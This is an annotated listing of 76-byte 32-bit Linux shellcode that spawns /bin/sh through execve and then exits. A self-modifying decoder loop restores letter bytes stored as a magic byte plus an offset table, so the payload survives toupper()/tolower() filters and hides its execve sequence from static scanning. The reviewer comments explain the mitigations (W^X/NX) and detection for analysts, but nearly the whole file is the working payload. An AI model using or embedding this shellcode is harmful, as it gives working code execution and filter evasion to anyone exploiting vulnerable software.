/*-------------------------------------------------------*/
/* Magic Byte Self Modifying Code for surviving          */
/* toupper() & tolower()                                 */
/* 76bytes execve() _exit() code by XORt                 */
/*-------------------------------------------------------*/
/* Reviewer's reading of the bytes (for analysts, not a how-to):
 *  - Target is 32-bit Linux: int $0x80 with eax = 0xb (execve), then
 *    eax = 1 (_exit).
 *  - No byte in the listing falls in 0x41-0x5a or 0x61-0x7a, so a
 *    toupper()/tolower() pass over the buffer is a no-op on it. The
 *    letters the payload needs (four ModRM bytes of the instructions
 *    marked '@' below, and "bin"/"sh") are stored as the magic byte
 *    0x7b ('{') plus a per-byte offset table, and restored at run time
 *    by `subb %al, (%edi)` (original = 0x7b - table entry).
 *  - The restore loop writes into its own code, and the execve set-up
 *    stores past the end of the 76 bytes (see 0x7/0x8/0xc(%esi)); the
 *    page holding the code must therefore be writable AND executable.
 *    With W^X / NX enforced it faults at the first fetch or the first
 *    store, which is the relevant mitigation for this technique.
 *  - Detection note: the 25-byte decoder stub (bytes 0-24) is never
 *    modified, while "/bin/sh" and the final instruction bytes only
 *    exist in memory after the loop has run, so static scanning of the
 *    buffer sees the stub, not the execve sequence.
 */

/*--decoder: jump to the call that pushes the table address------------*/
"\xeb\x34"              /* jmp +0x34 -> [revert] (the call at byte 54)  */
"\x5e"                  /* pop %esi ; esi = return address pushed by the
                           call = start of the offset table (byte 59)   */

/*--set-up-variables---------------------------------------------------*/
"\x89\xf7"              /* mov %esi, %edi                               */
"\x83\xef\x22"          /* sub $0x22, %edi ; edi = table - 34 = byte 25,
                           the first byte of the modified shellcode     */
"\x31\xc9"              /* xor %ecx, %ecx                               */
"\xb1\x8c"              /* mov $0x8c, %cl                               */
"\xd1\xc9"              /* ror $0x1, %ecx ; ecx = 0x46 = 70. 0x46 is 'F'
                           (would not survive toupper/tolower), hence the
                           rotate. The 70 is a shared budget: each scasb
                           compare and each `loop` consume one; by my
                           count it is exhausted exactly on the 10th
                           patch, which is what lets `xchg` below read
                           ecx == 0 -- confirm if the layout is changed  */

/*-scan-for-magic-byte-------------------------------------------------*/
"\xb0\x7b"              /* mov $0x7b, %al ; magic byte '{'              */
"\xf2\xae"              /* repne scasb ; edi advances past the next 0x7b,
                           decrementing ecx once per byte compared      */
"\xff\xcf"              /* dec %edi ; back onto the magic byte          */
"\xac"                  /* lodsb ; al = next table entry, esi++         */
"\x28\x07"              /* subb %al, (%edi) ; *edi = 0x7b - entry        */

/*--loop-back-to-scanner-----------------------------------------------*/
"\xe2\xf5"              /* loop -$0xe [load-byte] ; falls through with
                           ecx == 0; esi now points just past the 10-byte
                           table, i.e. at the "/bin/sh" bytes            */
/*-------------------------------------[length:25bytes]----------------*/

/*--modified-shellcode (bytes shown pre-patch; '@' = contains 0x7b)----*/
/* NOTE(review): 0x7(%esi) is byte 76, one past the end of this listing;
 * the three stores below assume writable memory directly following the
 * shellcode.                                                            */
"\x89\x7b\x08"          /* movl %esi, 0x8(%esi) @ ; argv[0] = "/bin/sh"  */
"\x91"                  /* xchg %eax, %ecx ; ecx is 0 after the loop,
                           so this zeroes eax                            */
"\x88\x7b\x07"          /* movb %al, 0x7(%esi) @ ; NUL-terminate string  */
"\x89\x7b\x0c"          /* movl %eax, 0xc(%esi) @ ; argv[1] = NULL       */
"\xb0\x0b"              /* movb $0xb, %al ; __NR_execve                 */
"\x89\xf3"              /* movl %esi, %ebx ; ebx = filename             */
"\x8d\x7b\x08"          /* leal 0x8(%esi), %ecx @ ; ecx = argv           */
"\x8d\x7b\x0c"          /* leal 0xc(%esi), %edx @ ; edx = envp (-> NULL) */
"\xcd\x80"              /* int $0x80 ; execve(filename, argv, envp)     */
"\x31\xdb"              /* xorl %ebx, %ebx ; exit status 0              */
"\x89\xd8"              /* movl %ebx, %eax                              */
"\x40"                  /* inc %eax ; __NR_exit = 1                     */
"\xcd\x80"              /* int $0x80 ; _exit(0), reached only if execve
                           returned                                     */

/*--revert-------------------------------------------------------------*/
"\xe8\xc7\xff\xff\xff"  /* call -$0x39 -> [pop %esi]; pushes the address
                           of the offset table that follows              */

/*--offset-table-------------------------------------------------------*/
"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13"
                        /* one entry per magic byte, in scan order:
                           first five restore the ModRM bytes of the five
                           '@' instructions above, last five restore
                           'b','i','n','s','h' (0x7b - entry each)       */

/*--string-to-run------------------------------------------------------*/
"/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh" with each letter replaced
                           by the magic byte; the '/' bytes need no
                           encoding                                      */
/*--------------------------------------[length:51bytes]---------------*/